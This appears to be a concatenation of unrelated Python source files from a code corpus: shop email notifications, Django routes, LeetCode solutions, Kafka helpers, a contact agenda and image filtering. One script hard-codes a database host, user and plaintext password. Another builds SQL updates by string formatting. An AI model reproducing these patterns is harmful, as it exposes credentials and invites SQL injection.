align="center" class="container-table" style="mso-table-lspace: 0pt; mso-table-rspace: 0pt; border-collapse: collapse; padding: 0; margin: 0 auto; width: 600px;"><tr><td style="font-family: Verdana, Arial; font-weight: normal; border-collapse: collapse; vertical-align: top; padding: 0; margin: 0;"><table cellpadding="0" cellspacing="0" border="0" class="logo-container" style="mso-table-lspace: 0pt; mso-table-rspace: 0pt; border-collapse: collapse; padding: 0; margin: 0; width: 100%;"><tr><td class="logo" style="font-family: Verdana, Arial; font-weight: normal; border-collapse: collapse; vertical-align: top; padding: 15px 0px 10px 5px; margin: 0;"><a href="http://store.sanhigia.com/es/%22%22/index/index/" style="color: #c52213; float: left; display: block;"><img width="165" style="-ms-interpolation-mode: bicubic; outline: none; text-decoration: none;"></a></td></tr></table></td></tr><tr><td valign="top" class="top-content" style="font-family: Verdana, Arial; font-weight: normal; border-collapse: collapse; vertical-align: top; padding: 5px; margin: 0; border: 1px solid #ebebeb; background: #FFF;"><!-- Begin Content --><div class="header"><img src="http://store.sanhigia.com/skin/frontend/accessshop/default/images/sanhigia_logo.jpg" style="max-width: 300px; margin: 0 auto; display: block; -ms-interpolation-mode: bicubic;"/></div><table cellpadding="0" cellspacing="0" border="0" style="margin-top: 30px; mso-table-lspace: 0pt; mso-table-rspace: 0pt; border-collapse: collapse; padding: 0; margin: 0; width: 100%;"><tr><td class="action-content" style="font-family: Verdana, Arial; font-weight: normal; border-collapse: collapse; vertical-align: top; padding: 10px 20px 15px; margin: 0; line-height: 18px;"><h4 style="font-family: Verdana, Arial; font-weight: normal;">'
                # Substitute the tracking number into the carrier's URL template.
                urlsegui = urlsegui.replace("#TN#", numtracking)
                cuerpo2 = '<h4>ACTUALIZACIÓN DE TU PEDIDO</h4><p>Tu pedido con albarán {0} ha sido enviado.<br>El número del seguimiento del pedido es {1}.</p>Puedes comprobar el estado del envío <a href="{2}" target="_blank">pulsar aqui</a><br><br>Gracias, Sanhigía'.format(codigo, numtracking, urlsegui)
                cuerpo += cuerpo2
                cuerpo += '</h4></td></tr></table></td></tr></table></td></tr></table>'
            # Check the send state and dispatch; multiple recipients are
            # supported as a comma-separated list.
            email = "{}".format(email)
            emails = email.split(",")
            if connection is False:
                # syncppal.iface.log("Error. Los datos de conexión han fallado", "enviocorreo")
                estado = "Error"
            elif notifications.sendMail(connection, oDM.usuariosmtp, asunto, cuerpo, emails) is False:
                # syncppal.iface.log("Error. Ocurrió un error durante el proceso de enviar correos de segumiento de envio", "enviocorreo")
                estado = "Error"
            else:
                # syncppal.iface.log("Exito. Se ha enviado email con número el seguimiento al cliente {}".format(item["nombre"]), "enviocorreo")
                estado = "Enviado"
            # Persist the outcome on the delivery note.
            qsatype.FLSqlQuery().execSql("UPDATE albaranescli SET sh_estadosegui = '{}' WHERE idalbaran = '{}'".format(estado, idalbaran))
        return True
    def __init__(self, context=None):
        super(sanhigia_sync, self).__init__(context)
# @class_declaration head #
class head(sanhigia_sync):
    """Extension point kept for the legacy class-chain layout."""
    def __init__(self, context=None):
        super(head, self).__init__(context)
# @class_declaration ifaceCtx #
class ifaceCtx(head):
    """Top of the class chain; instances of this become the module iface."""
    def __init__(self, context=None):
        super(ifaceCtx, self).__init__(context)
# @class_declaration FormInternalObj #
class FormInternalObj(qsatype.FormDBWidget):
    """Widget shell that instantiates the iface chain on init."""
    def _class_init(self):
        # Expose the top of the class chain as this form's iface.
        self.iface = ifaceCtx(self)
# Module-level singleton wiring expected by the legacy loader: instantiate
# the form once and make its iface self-referential so both 'ctx' and
# 'iface' resolve to the same object.
form = FormInternalObj()
form._class_init()
form.iface.ctx = form.iface
form.iface.iface = form.iface
iface = form.iface
|
24,612 | 8a504c72170f750fd962977234af684cd6277bbd | def string_to_array(string):
return string.split(" ")
#tests
# NOTE(review): `Test` is the Codewars platform's test framework object,
# injected by its runner — this section is not runnable standalone.
Test.describe("Basic tests")
Test.assert_equals(string_to_array("Robin Singh"), ["Robin", "Singh"])
Test.assert_equals(string_to_array("CodeWars"), ["CodeWars"])
Test.assert_equals(string_to_array("I love arrays they are my favorite"), ["I", "love", "arrays", "they", "are", "my", "favorite"])
Test.assert_equals(string_to_array("1 2 3"), ["1", "2", "3"])
Test.assert_equals(string_to_array(""), [""])
# Fuzz against a reference lambda with random space-separated tokens.
Test.describe("Random tests")
from random import randint
sol=lambda s: s.split(" ")
base="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
for _ in range(40):
    s=" ".join(["".join([base[randint(0,len(base)-1)] for q in range(randint(1,20))]) for k in range(randint(1,15))])
    Test.it("Testing for "+repr(s))
    Test.assert_equals(string_to_array(s),sol(s),"It should work for random inputs too")
|
24,613 | 01fcec60c7e8aa9f00e9cba3294f7d1eaf0abb01 | from nested_admin import urls as nested_admin_urls
from django.conf import settings
from django.conf.urls import include, url
from django.urls import path
from django.views.generic.base import RedirectView
from django.conf.urls.static import static
from django.contrib.admin.views.decorators import staff_member_required
from django.views.decorators.cache import never_cache
from democracy import urls_v1
from democracy.views.upload import browse, upload
from helusers.admin_site import admin
urlpatterns = [
    # Django admin (helusers' admin site).
    url(r'^admin/', admin.site.urls),
    # helusers auth endpoints mounted at the root.
    url(r'', include('helusers.urls')),
    # python-social-auth login flows.
    url('', include('social_django.urls', namespace='social')),
    # Versioned REST API.
    url(r'^v1/', include(urls_v1)),
    url(r'^nested_admin/', include(nested_admin_urls)),
    url(r'^ckeditor/', include('ckeditor_uploader.urls')),
    # CKEditor file handling: both staff-only; browse additionally never cached.
    url(r'^upload/', staff_member_required(upload), name='ckeditor_upload'),
    url(r'^browse/', never_cache(staff_member_required(browse)), name='ckeditor_browse'),
    # Bare root redirects into the API.
    path('', RedirectView.as_view(url='v1/'))
]
# Serve uploaded media directly only in development.
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
24,614 | 854ca27801708bd74b7775d40a0ec6e4f60a5112 | import mysql.connector
from mysql.connector import Error
from configparser import ConfigParser
import numpy as np
# http://www.mysqltutorial.org/python-mysql-query/
# Connect to the `log` database and dump the cfvdata table into a NumPy array.
# SECURITY(review): host and credentials are hard-coded in source — move them
# to a config file or environment variables.
db = 'log'
conn = mysql.connector.connect(host='10.6.66.160', database=db, user='debian-sys-maint', password = 'SoLcxvfgbzqU0ixI')
# curser = area where all the records are stored
dbcursor = conn.cursor()
# dbcursor.execute('SHOW TABLES')
# print(dbcursor.fetchall())
table = 'SELECT * FROM cfvdata'
dbcursor.execute(table)
# Column names come from the cursor's description metadata.
table_name = [i[0] for i in dbcursor.description]
print(table_name)
BMS = dbcursor.fetchall()
BMSnp = np.array(BMS)
print(np.shape(BMSnp))
|
24,615 | c309bf668b04ecc3ad4b773b28a80aefb845d193 | """
Fraction to Recurring Decimal
Given two integers representing the numerator and denominator of a fraction, return the fraction in string format.
If the fractional part is repeating, enclose the repeating part in parentheses.
If multiple answers are possible, return any of them.
It is guaranteed that the length of the answer string is less than 10^4 for all the given inputs.
Input: numerator = 1, denominator = 2
Output: "0.5"
Example 2:
Input: numerator = 2, denominator = 1
Output: "2"
Example 3:
Input: numerator = 2, denominator = 3
Output: "0.(6)"
Example 4:
Input: numerator = 4, denominator = 333
Output: "0.(012)"
Example 5:
Input: numerator = 1, denominator = 5
Output: "0.2"
Constraints:
-2^31 <= numerator, denominator <= 2^31 - 1
denominator != 0
"""
class Solution:
    def fractionToDecimal(self, numerator: int, denominator: int) -> str:
        """Return numerator/denominator as a decimal string.

        A repeating fractional part is wrapped in parentheses, e.g.
        2/3 -> "0.(6)".  Long division is simulated digit by digit; once a
        remainder repeats, the digits produced since its first occurrence
        recur forever.  (A leftover `import pdb; pdb.set_trace()` debug
        breakpoint was removed from this method.)
        """
        # Work with absolute values; remember the sign separately.
        # numerator == 0 deliberately yields '+' so we never emit "-0".
        sign = '-' if (numerator < 0 < denominator) or (denominator < 0 < numerator) else '+'
        numerator, denominator = abs(numerator), abs(denominator)
        res, rem = divmod(numerator, denominator)
        res = str(res) if sign == '+' else f'-{res}'
        if not rem:
            return res
        res += '.'
        # Map each remainder to the output position where it first appeared.
        seen = {}
        while rem:
            if rem in seen:
                # Same remainder again -> digits since then repeat forever.
                res = f"{res[:seen[rem]]}({res[seen[rem]:]})"
                break
            seen[rem] = len(res)
            rem *= 10
            res += str(rem // denominator)
            rem %= denominator
        return res
# Smoke test: expect "0.5" followed by "0.(012)".
numerator = 1
denominator = 2
print(Solution().fractionToDecimal(numerator, denominator))
numerator = 4
denominator = 333
print(Solution().fractionToDecimal(numerator, denominator))
class node:
    """Singly linked list node holding one item."""

    def __init__(self, item):
        self.data = item
        self.next = None  # None terminates the list (was the string 'null')

    def setData(self, item):
        # BUG FIX: these accessor methods previously lacked the `self` parameter.
        self.data = item

    def setNext(self, item):
        self.next = item

    def getData(self):
        return self.data


class queue:
    """FIFO queue built on linked nodes.

    The constructor seeds the queue with a single item; `push` appends at
    the tail and `pop` removes and returns the item at the head.
    """

    def __init__(self, item):
        # One node serves as both head and tail of the 1-element queue
        # (the original built two disconnected nodes for the same item).
        self.head = node(item)
        self.tail = self.head

    def pop(self):
        """Remove and return the oldest item."""
        value = self.head.getData()
        # BUG FIX: advance along the node chain (was `self.head = self.next`).
        self.head = self.head.next
        return value

    def push(self, newItem):
        """Append an item at the tail."""
        newNode = node(newItem)
        # BUG FIX: link the new node after the current tail (was
        # `self.next = newNode`, which never touched the list, followed by
        # a call to the misspelled `setnext`).
        self.tail.setNext(newNode)
        self.tail = newNode
|
24,617 | ed98f1e4679286f2fc79488df96143eab9f104f0 | #!/usr/bin/env python
# find reads matching target genes using BLAST
from pyphylogenomics import BLAST

# Input query reads and the reference gene set to search against.
# (Removed the spurious C-style trailing semicolons.)
query_seqs = "data/modified/wrk_ionfile.fasta"
genome = "data/genes_Bmori.fasta"

# Output is a csv file: data/modified/wrk_ionfile_blastn_out.csv
BLAST.blastn(query_seqs, genome)
|
24,618 | 8e06dc2b535aec230142c3a497e717f0da6b8b84 |
'''
The script contains CR (carriage return) characters.
The shell interprets these CR characters as arguments.
Solution: Remove the CR characters from the script using the following script.
Why this happened: Windows use CR, LF for line ending.
Need to change back to LF for Unix
The other way to solve this:
Open the file in vim or vi, and administer the following command:
:set ff=unix
Save and exit:
:wq
Done!
Explanation
ff stands for file format, and can accept the values of unix (\n), dos (\r\n) and mac (\r) (only meant to be used on pre-intel macs, on modern macs use unix).
To read more about the ff command:
:help ff
:wq stands for Write and Quit, a faster equivalent is Shift+zz (i.e. hold down Shift then press z twice).
'''
# Strip every CR byte so the file uses Unix (LF-only) line endings.
with open('hello.py', 'rb+') as f:
    content = f.read()
    f.seek(0)  # rewind so the cleaned bytes overwrite the original
    f.write(content.replace(b'\r', b''))
    f.truncate()  # drop leftover tail bytes: the cleaned content is shorter
24,619 | 56321a1cf966b721f95fe4fe26608ee2b4645a19 | import sys
import requests
from bs4 import BeautifulSoup
def trade_spider():
    """Print the first command-line argument.

    The original Twitter-scraping logic (requests + BeautifulSoup over a
    user timeline) is kept below, commented out.
    """
    #k = input()
    print(sys.argv[1])
    # print(stra)
    # url = 'https://twitter.com/SumaaaaiL'
    # source_code = requests.get(url,allow_redirects=False)
    # plain_text = source_code.text.encode('ascii', 'replace')
    # soup = BeautifulSoup(plain_text, 'html.parser')
    # for link in soup.findAll('p', {'class': 'TweetTextSize TweetTextSize--normal js-tweet-text tweet-text'}):
    # title = link.string
    # print(title)
trade_spider()
|
24,620 | 2fdd9a0d52f942517f6f76c7071c96908d2add31 | import os
# Load any previously saved contacts.  BUG FIX: "rw" is not a valid open()
# mode in Python 3 (it raises ValueError) and only reading is needed here;
# also tolerate a missing file on the first run.
lista = []
try:
    with open("agenda.csv", "r") as arq2:
        lista = arq2.readlines()
except FileNotFoundError:
    pass  # first run: start with an empty agenda
print(lista)
def menu():
    """Print the numbered main-menu options to the console."""
    print("\n", "=" * 50)
    print("1 - Criar contato")
    print("2 - Para excluir contato")
    print("3 - Para listar contatos")
    print("4 - Sair")
def lista_agenda(nome, data, opc):
    # Dispatch on opc: 1=add, 2=delete (prompts for an index), 3=list, 4=quit.
    # Mutates the module-level `lista` and rewrites agenda.csv on every call
    # except quit.  The `os.system("sleep ...")` pauses are Unix-only.
    if(opc==1):
        contato = nome+";"+data+"\n"
        lista.append(contato)
        lista.sort()
        print("Contato inserido com sucesso!")
        os.system("sleep 1s")
    if(opc==2):
        tam = len(lista)
        for i in range(tam):
            print(i,"-",lista[i])
        delete = int(input("Qual deseja apagar? "))
        lista.pop(delete)
        print("Registro excluido")
        os.system("sleep 3s")
    if(opc==3):
        for i in lista:
            print(i)
        os.system("sleep 3s")
    if(opc==4):
        print("byebye")
        return 0;
    # Persist the (possibly modified) agenda back to disk.
    arq = open("agenda.csv", "w")
    tam = len(lista)
    for i in range(tam):
        arq.write(lista[i])
    arq.close()
# Interactive loop: show the menu, read an option, dispatch to lista_agenda.
o = 0
while True:
    os.system("clear")  # Unix-only screen clear
    menu()
    o = int(input("Opcao: "))
    if(o==4):
        break
    if(o==1):
        n = input("Digite um nome: ")
        d = input("Digite uma data: ")
        lista_agenda(n,d,1)
    if(o==2):
        lista_agenda(0,0,2)
    if(o==3):
        lista_agenda(0,0,3)
|
24,621 | 6e3d7319f0311dad25e2d894ca69fea703c4eb6a | from pykafka import KafkaClient
from tornado.options import options
def handle_request(request_topic_name, customer_group, response_topic_name):
    """Build the consumer/producer pair used by the parsing service.

    Returns a balanced consumer on the raw-request topic (filled by the
    access service) and a producer on the response topic.
    """
    # Consumer side.
    consumer_client = KafkaClient(hosts=options.kafka_connect, use_greenlets=True)
    request_consumer = consumer_client.topics[request_topic_name].get_balanced_consumer(
        consumer_group=customer_group,
        auto_commit_enable=True,
        zookeeper_connect=options.zookeeper_connect,
    )
    # Reply side.
    producer_client = KafkaClient(hosts=options.kafka_connect, use_greenlets=True)
    response_producer = producer_client.topics[response_topic_name].get_producer()
    return request_consumer, response_producer
def transfer_raw(raw_topic_name):
    """Return a producer that publishes raw data to Kafka for the
    reporting and storage services to consume later."""
    client = KafkaClient(hosts=options.kafka_connect, use_greenlets=True)
    return client.topics[raw_topic_name].get_producer()
|
class Animal:
    """Base class: an animal with a name and a species."""

    def __init__(self, name, species):
        self.name = name
        self.species = species

    def __repr__(self):
        return f"{self.name} is a {self.species}"

    def make_sound(self, sound):
        print(f"this animal says {sound}")


class Cat(Animal):
    """An Animal whose species is always "Cat", plus a breed and a toy."""

    def __init__(self, name, breed, toy):
        # super() fixes the species; the old `self.species = species` line
        # raised NameError because no local `species` existed here.
        super().__init__(name, species="Cat")
        self.breed = breed
        self.toy = toy

    def play(self):
        print(f"{self.name} plays with {self.toy}")


# Demo.  BUG FIXES: the original called Cat() with no arguments (TypeError)
# and printed the nonexistent attribute `blue.cool` (AttributeError).
blue = Cat("Blue", "Scottish Fold", "string")
blue.make_sound("MEOW")
print(blue)
print(isinstance(blue, Animal))
print(isinstance(blue, object))
#Properties
# class Human:
# def __init__(self, first, last, age):
# self.first = first
# self.last = last
# if age >= 0:
# self._age = age
# else:
# self._age = 0
# def get_age(self):
# return self._age
# def set_age(self, new_age):
# if new_age >= 0:
# self._age = new_age
# else:
# self._age = 0
# @property
# def age(self):
# return self._age
# @age.setter
# def age(self, value):
# if value >= 0:
# self._age = value
# else:
# raise ValueError("age can't be negative")
# jane = Human("Jane", "Goodall", 50)
# print(jane.age) |
24,623 | 064f5782866a6c6dcd9e86348ec659b4a4b84ead | '''
Usage:
- sudo python receive.py -p 12345
Author:
Swapnasheel
'''
import os, sys, argparse
from scapy.all import *
def create_parser():
    """Build the command-line parser: one required -p/--port integer."""
    arg_parser = argparse.ArgumentParser(description="To allow user to pass inputs")
    arg_parser.add_argument('-p', '--port', help="Port to sniff on", type=int, required=True)
    return arg_parser
def handle_pkt(pkt, port):
    # Dump only TCP packets whose destination matches the requested port.
    # (Python 2 print statements; TCP comes from scapy's wildcard import.)
    if TCP in pkt and pkt[TCP].dport==port:
        print "Got a packet!"
        pkt.show2()
        sys.stdout.flush()
def Main():
    # Parse -p/--port, then sniff on the first ethN interface listed under
    # /sys/class/net/ (Linux-specific; Python 2 — filter() returns a list here).
    args = create_parser().parse_args()
    iface = filter(lambda i: 'eth' in i, os.listdir('/sys/class/net/'))[0]
    print "Sniffing on %s " % iface
    sys.stdout.flush()
    # Every captured packet is handed to handle_pkt along with the port filter.
    sniff(iface=iface, prn=lambda x: handle_pkt(x, args.port))
if __name__ == '__main__':
Main()
|
24,624 | eb31b5fa171a5fa243279c307a3f3a88b06bafdb | # -*- coding: utf-8 -*-#
"""
Created on 2020/7/6 16:16
@Project:
@Author: liuliang
@Email: 1258644178@qq.com
@Description:
@version: V1
"""
from typing import List
class Solution:
    """Count reverse pairs (i < j with nums[i] > nums[j]) via merge sort."""

    def __init__(self):
        self.ans = 0  # running count of reverse pairs

    def reversePairs(self, nums: List[int]) -> int:
        """Return the number of reverse pairs in *nums* (input not modified).

        BUG FIXES: the counter is now reset here, so repeated calls on one
        instance stay correct (it used to accumulate across calls), and the
        leftover debug `print(...)` of the sorted list was removed.
        """
        self.ans = 0
        self.merge_sort(nums)
        return self.ans

    def merge_sort(self, nums):
        """Return a sorted copy of *nums*, counting pairs along the way."""
        if len(nums) <= 1:
            return nums
        mid = len(nums) // 2
        left = self.merge_sort(nums[:mid])
        right = self.merge_sort(nums[mid:])
        return self.merge(left, right)

    def merge(self, nums1, nums2):
        """Merge two sorted runs, counting cross-run reverse pairs."""
        left = 0
        right = 0
        new_arr = []
        while left < len(nums1) and right < len(nums2):
            if nums1[left] > nums2[right]:
                # The right value is smaller: it forms a reverse pair with
                # every element still remaining in the left run.
                new_arr.append(nums2[right])
                self.ans += (len(nums1) - left)
                right += 1
            else:
                new_arr.append(nums1[left])
                left += 1
        new_arr.extend(nums1[left:])
        new_arr.extend(nums2[right:])
        return new_arr
class Solution:
    # NOTE: this second Solution shadows the class of the same name defined
    # above; only this one is visible to the calls at the bottom of the file.
    def reversePairs(self, nums: List[int]) -> int:
        """Count pairs (i < j) with nums[i] > nums[j] by in-place merge sort.

        Side effect: *nums* is sorted in place when this returns.
        """
        self.cnt = 0
        def merge(nums, start, mid, end):
            # Merge nums[start..mid] and nums[mid+1..end]; each time a
            # right-half element wins, every element still unconsumed in the
            # left half forms a reverse pair with it.
            i, j, temp = start, mid + 1, []
            while i <= mid and j <= end:
                if nums[i] <= nums[j]:
                    temp.append(nums[i])
                    i += 1
                else:
                    self.cnt += mid - i + 1
                    temp.append(nums[j])
                    j += 1
            while i <= mid:
                temp.append(nums[i])
                i += 1
            while j <= end:
                temp.append(nums[j])
                j += 1
            # Copy the merged run back into place.
            for i in range(len(temp)):
                nums[start + i] = temp[i]
        def mergeSort(nums, start, end):
            if start >= end: return
            mid = (start + end) >> 1
            mergeSort(nums, start, mid)
            mergeSort(nums, mid + 1, end)
            merge(nums, start, mid, end)
        mergeSort(nums, 0, len(nums) - 1)
        return self.cnt
# class Solution():
# def mergeSort(self, nums):
#
# if len(nums) <= 1:
# return nums
# mid = len(nums) >> 1
# left = self.mergeSort(nums[:mid])
# right = self.mergeSort(nums[mid:])
# return self.merge(left, right)
#
# def merge(self, nums1, nums2):
# new_arr = []
# i, j = 0, 0
# while i < len(nums1) and j < len(nums2):
# if nums1[i] < nums2[j]:
# new_arr.append(nums1[i])
# i += 1
# else:
# new_arr.append(nums2[j])
# j += 1
#
# while i < len(nums1):
# new_arr.append(nums1[i])
# i += 1
# while j < len(nums2):
# new_arr.append(nums2[j])
# j += 1
# return new_arr
# Smoke test: expect 5 for [7, 5, 6, 4].
s = Solution()
ans = s.reversePairs([7, 5, 6, 4])
print(ans)
# ans = s.reversePairs([1, 3, 2, 3, 1])
# NOTE: the call above is commented out, so the second print below repeats
# the previous result instead of printing 4.
print(ans)
|
24,625 | 94254250bc45b9e14fd4c9051ccb3dd0cb549add | import falcon
from mashina.config import settings
from mashina.routing import root_routes
from mashina.utils.misc import import_string
class App(falcon.API):
    """Falcon application wired up with configured middleware and routes."""

    def __init__(self):
        super(App, self).__init__(middleware=self.get_middlewares())
        self.add_routes()

    def get_middlewares(self):
        """Instantiate every middleware class named in settings.MIDDLEWARE."""
        return [import_string(dotted_path)() for dotted_path in settings.MIDDLEWARE]

    def add_routes(self):
        """Register each (uri_template, resource) pair from root_routes."""
        for route_spec in root_routes:
            self.add_route(*route_spec)
|
24,626 | 0b1ad00ff22d9d04a0cb9fe4183a19b3c67df6a4 | import unittest
from coinStairs import solution
class CoinStairsTest(unittest.TestCase):
    """Unit tests for coinStairs.solution.

    Local variables renamed from `input`/`output`, which shadowed the
    built-in input() function.
    """

    def test_first(self):
        coins = 5
        expected = 2
        self.assertEqual(solution(coins), expected)

    def test_second(self):
        coins = 8
        expected = 3
        self.assertEqual(solution(coins), expected)
if __name__ == '__main__':
unittest.main()
|
24,627 | 4fae9a8d34221809a76ca7ffe0ab05460de44866 | import scrapy
from kingfisher_scrapy.base_spider import IndexSpider
from kingfisher_scrapy.util import parameters
class MexicoAdministracionPublicaFederal(IndexSpider):
    """
    Domain
    Administración Pública Federal (APF)
    Bulk download documentation
    https://datos.gob.mx/busca/dataset/concentrado-de-contrataciones-abiertas-de-la-apf
    """
    name = 'mexico_administracion_publica_federal'
    # Each API result entry is a record package (kingfisher data_type value).
    data_type = 'record_package_list_in_results'
    # JSON Pointers into the list response that IndexSpider uses for paging.
    count_pointer = '/pagination/total'
    limit = '/pagination/pageSize'
    use_page = True
    formatter = staticmethod(parameters('page'))
    def start_requests(self):
        # Fetch page 1; IndexSpider.parse_list derives the remaining pages
        # from the pagination pointers above.
        url = 'https://api.datos.gob.mx/v1/contratacionesabiertas'
        yield scrapy.Request(url, meta={'file_name': 'page-1.json'}, callback=self.parse_list)
|
24,628 | fd775283a37b0669c7d0c7686577516d98bd29d2 | #!/usr/bin/env python
import os
import matplotlib
import numpy as np
import struct
# Extract the three leading uint32 mesh indices of every source record from
# the moment-rate binary and write them as whitespace-separated rows.
file_mmt = "momrate_LaHabra.zf.100m.rev.bin"
file_out = "mesh_src.dat"

nsrc = 1560            # number of source records in the file
nt = 5000              # time steps per moment-rate trace
nmom = 6               # moment components per time step
nseek = 4 * nmom * nt  # bytes of 4-byte trace samples to skip per record

# Context managers guarantee both files are closed even if a read fails
# part-way (the original left them open on any exception).
with open(file_mmt, 'rb') as fidin, open(file_out, 'w') as fidout:
    for i in range(nsrc):
        # Each record starts with three unsigned 32-bit coordinates...
        dat = struct.unpack('3I', fidin.read(12))
        fidout.write(" ".join(str(x) for x in dat) + "\n")
        # ...followed by the trace block, which we skip over.
        fidin.seek(nseek, 1)
|
24,629 | 515ef26beeb1f04b08b434f218c979b81706306c | # Generated by Django 2.2 on 2019-05-20 10:46
from django.db import migrations, models
class Migration(migrations.Migration):
    # NOTE(review): the literal defaults below were baked in when
    # `makemigrations` evaluated a random-string generator, so every row
    # touched by this migration shares the SAME "random" value — confirm
    # whether the model fields should pass the callable itself as `default`.

    dependencies = [
        ('Account', '0007_auto_20190416_1936'),
    ]
    operations = [
        migrations.AlterField(
            model_name='extendeduser',
            name='api_key',
            field=models.CharField(default='SjyL2w6z7z', max_length=32, unique=True),
        ),
        migrations.AlterField(
            model_name='extendeduser',
            name='restore_token',
            field=models.CharField(default='TUsim3JDzkqxXTHy', max_length=32),
        ),
        migrations.AlterField(
            model_name='extendeduser',
            name='secret_key',
            field=models.CharField(default='O6d746CjsX', max_length=32),
        ),
        migrations.AlterField(
            model_name='extendeduser',
            name='token',
            field=models.CharField(default='dseHS0q2EssSFsix', max_length=32),
        ),
    ]
|
24,630 | 8e86d5c79321a4633c5d95037b3192f3891ccd65 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
# Write the two words with their characters alternating (word1[0], word2[0],
# word1[1], word2[1], ...).  zip() replaces index-based access and simply
# stops at the shorter word instead of raising IndexError on unequal lengths.
word1 = u'パトカー'
word2 = u'タクシー'
for ch1, ch2 in zip(word1, word2):
    sys.stdout.write(ch1 + ch2)
|
24,631 | 0d45cef44266f559532600de6fde3a4361c949ff | from norman.web.frontend.auth_login import AuthLoginView
from norman.web.frontend.auth_logout import AuthLogoutView
from norman.web.frontend.home import HomeView
from norman.web.frontend.farmer import OrganizationFarmerListView, OrganizationFarmerAddView
from norman.web.frontend.crops import OrganizationCropsListView
from norman.web.frontend.inventory import OrganizationInventoryView
from norman.web.frontend.orders import OrganizationOrdersView
from django.conf.urls import url
__all__ = ('urlpatterns')
urlpatterns = [
url(r'^$', HomeView.as_view(), name='norman-home'),
url(r'^auth/login/$', AuthLoginView.as_view(),
name='norman-login'),
url(r'^auth/logout/$', AuthLogoutView.as_view(),
name='norman-logout'),
url(r'^farmers/$', OrganizationFarmerListView.as_view(), name='organization-farmer-list'),
url(r'^farmers/add/$', OrganizationFarmerAddView.as_view(), name='organization-farmer-add'),
url(r'^crops/$', OrganizationCropsListView.as_view(), name='organization-crops-list'),
url(r'^inventory/$', OrganizationInventoryView.as_view(), name='organization-inventory'),
url(r'^orders/$', OrganizationOrdersView.as_view(), name='organization-orders'),
] |
24,632 | 4f50acd4b80bd82a5d720d578ac37d454a198ab8 | import boto3
import os
def main(req):
    """Handler that puts or gets an object in the middleware S3 store.

    The target endpoint and credentials are looked up from MWARE_<BUCKET>_*
    environment variables; returns ({"res": ...}, None).
    """
    bucket = req.args['bucket']
    env_tag = bucket.upper()
    endpoint = os.getenv('MWARE_' + env_tag + '_ADDR')
    access_key = os.getenv('MWARE_' + env_tag + '_S3KEY')
    secret_key = os.getenv('MWARE_' + env_tag + '_S3SEC')
    client = boto3.session.Session().client(
        service_name='s3',
        aws_access_key_id=access_key,
        aws_secret_access_key=secret_key,
        endpoint_url='http://' + endpoint + '/',
    )
    action = req.args['action']
    if action == 'put':
        client.put_object(Bucket=bucket, Key=req.args['name'], Body=req.args['data'])
        result = 'done'
    elif action == 'get':
        reply = client.get_object(Bucket=bucket, Key=req.args['name'])
        result = reply['Body'].read().decode("utf-8") if reply['ContentLength'] > 0 else 'error'
    else:
        result = 'error'
    return { "res": result }, None
|
24,633 | 5016c1336c60c177e6b929e8298174e344d5d8b1 | # -*- coding: utf-8 -*-
"""
=============
No Histograms
=============
Sometimes marginalised histograms are not needed.
"""
from numpy.random import multivariate_normal, normal, seed
import numpy as np
from chainconsumer import ChainConsumer
seed(0)
cov = normal(size=(3, 3))
data = multivariate_normal(normal(size=3), np.dot(cov, cov.T), size=100000)
c = ChainConsumer().add_chain(data)
c.configure(plot_hists=False)
fig = c.plotter.plot()
fig.set_size_inches(3 + fig.get_size_inches()) # Resize fig for doco. You don't need this.
|
24,634 | 324d46073a9ba92b714577b62cc250b376475f80 | # -*- coding:utf-8 -*-
from PIL import Image
import numpy as np
from matplotlib import pyplot as plt
# 1 dimension gaussian filter
def convolve_1d(origin, sigma):
    """Smooth a 1-D signal with a Gaussian of width *sigma*.

    The kernel keeps ceil(4*sigma + 1) one-sided taps, normalised so the
    full (mirrored) kernel sums to 1; borders are handled by clamping the
    index, i.e. edge values are repeated.
    """
    origin = np.array(origin)
    # BUG FIX: `np.int` was removed in NumPy >= 1.24 — use the builtin int
    # instead of the old `.astype(np.int)`.
    length = int(np.ceil(sigma * 4 + 1))
    mask = np.zeros(length)
    sum_norm = 0
    # One-sided taps; every tap except the centre appears twice in the
    # mirrored kernel, hence the *2 with the centre subtracted once.
    for i in range(length):
        mask[i] = np.exp(-0.5 * np.square(i / sigma))
        sum_norm += mask[i] * 2
    sum_norm -= mask[0]
    mask /= sum_norm
    # Convolve with clamped (edge-replicating) borders.
    result = np.zeros(origin.shape)
    for x in range(len(origin)):
        acc = mask[0] * origin[x]
        for i in range(1, length):
            acc += mask[i] * origin[max(x - i, 0)] + mask[i] * origin[min(x + i, len(origin) - 1)]
        result[x] = acc
    return result
def convovle_2d(origin, sigma):
    """Apply the separable 1-D Gaussian along both axes: columns, then rows."""
    data = np.array(origin)
    # First pass: smooth every column.
    cols = np.zeros(data.shape)
    for c in range(data.shape[1]):
        cols[:, c] = convolve_1d(data[:, c], sigma)
    # Second pass: smooth every row by working on the transpose.
    rows = cols.T.copy()
    for c in range(rows.shape[1]):
        rows[:, c] = convolve_1d(rows[:, c], sigma)
    return rows.T
def convovle_matrix2d(origin, sigma):
    """Filter a 2-D array with a normalised 3x3 mask built from Gaussian samples.

    Borders are handled by clamping indices (edge pixels repeat).  Note the
    corner taps reuse the i=2 Gaussian sample, matching the original code.
    """
    img = np.array(origin)
    g = [np.exp(-0.5 * np.square(i / sigma)) for i in range(3)]
    mask = np.array([[g[2], g[1], g[2]],
                     [g[1], g[0], g[1]],
                     [g[2], g[1], g[2]]])
    mask = mask / np.sum(mask)
    height = img.shape[0]
    width = img.shape[1]
    out = np.zeros(img.shape)
    for x in range(height):
        for y in range(width):
            # Accumulate the nine taps with row/column indices clamped to
            # the image bounds (same tap order as the original expression).
            total = 0.0
            for dx in (-1, 0, 1):
                for dy in (-1, 0, 1):
                    px = min(max(x + dx, 0), height - 1)
                    py = min(max(y + dy, 0), width - 1)
                    total += mask[dx + 1, dy + 1] * img[px, py]
            out[x, y] = total
    return out
def gaussian_filter():
    """Demo driver: print the three convolution variants on a small matrix,
    then smooth ./lena.jpg with the 3x3 mask and display it."""
    a = [[1.0, 2.0, 3.0, 4.0, 5.0],
         [1.0, 2.0, 3.0, 4.0, 5.0],
         [1.0, 2.0, 3.0, 4.0, 5.0],
         [1.0, 2.0, 3.0, 4.0, 5.0],
         [1.0, 2.0, 3.0, 4.0, 5.0]]
    # convolve 1d
    print(convolve_1d(a, 0.8))
    # convolve 2d with 2 1d
    print(convovle_2d(a, 0.8))
